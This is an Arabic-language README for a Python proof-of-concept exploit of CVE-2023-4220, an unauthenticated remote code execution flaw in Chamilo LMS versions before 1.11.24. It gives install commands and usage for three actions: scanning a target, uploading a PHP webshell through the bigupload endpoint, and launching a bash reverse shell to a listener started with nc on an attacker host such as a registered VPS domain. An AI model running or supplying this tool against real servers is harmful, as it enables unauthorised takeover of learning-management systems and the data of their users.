
هذا سكريبت مكتوب بلغة بايثون يسمح باستغلال الثغرة الأمنية في برنامج إدارة التعلم (LMS) الخاص بـ Chamilo والمُوصوفة في CVE-2023-4220
هذا نص برمجي مكتوب بلغة Python يسمح باستغلال الثغرة الأمنية في برنامج Chamilo's LMS الموضحة في CVE-2023-4220. النظام معرض للخطر في الإصدارات التي تسبق 1.11.24.
انسخ المستودع إلى جهازك وقم بتثبيت التبعيات باستخدام pip (يوصى باستخدام virtualenv لإنشاء بيئة لعزل هذه التثبيتات عن التثبيتات العامة)
git clone https://github.com/charchit-subedi/chamilo-lms-unauthenticated-rce-poc cd chamilo-lms-unauthenticated-rce-poc pip install -r requirements.txt
يحتاج النص البرمجي إلى عنوان URL الهدف مع المسار الجذري لـ Chamilo (مثل http://example.com/chamilo أو http://example.com أو http://chamilo.example.com) وإجراءً لتنفيذه (هناك ثلاثة إجراءات متاحة: scan و webshell و revshell).
سيتحقق هذا الإجراء مما إذا كان الهدف معرضًا للخطر عن طريق محاولة الوصول إلى نقطة النهاية /main/inc/lib/javascript/bigupload/files/.
python3 main.py -u http://example.com/chamilo -a scan
سينشئ هذا الإجراء ملف PHP webshell في نقطة النهاية المعرضة للخطر.
python3 main.py -u http://example.com/chamilo -a webshell
سينشئ هذا الإجراء وينفذ ملف bash reverse shell. للقيام بذلك، سيتم أولاً إنشاء webshell باستخدام نفس الطريقة المستخدمة في الإجراء السابق. بعد ذلك، سيتم تنفيذ بعض الأوامر لإنشاء وتنفيذ ملف bash. تأكد من أنك تستمع على المنفذ الذي حددته باستخدام nc أو أي أداة أخرى حتى تحصل فعليًا على الاتصال العكسي. أيضًا، يمكن أن يكون المضيف عنوان IPv4 داخلي/عام صالح (مثل 172.17.1.4 أو 186.227.4.31) أو النطاق الذي سجلته (مثل evil-vps.domainreg.net)
python3 main.py -u http://example.com/chamilo -a revshell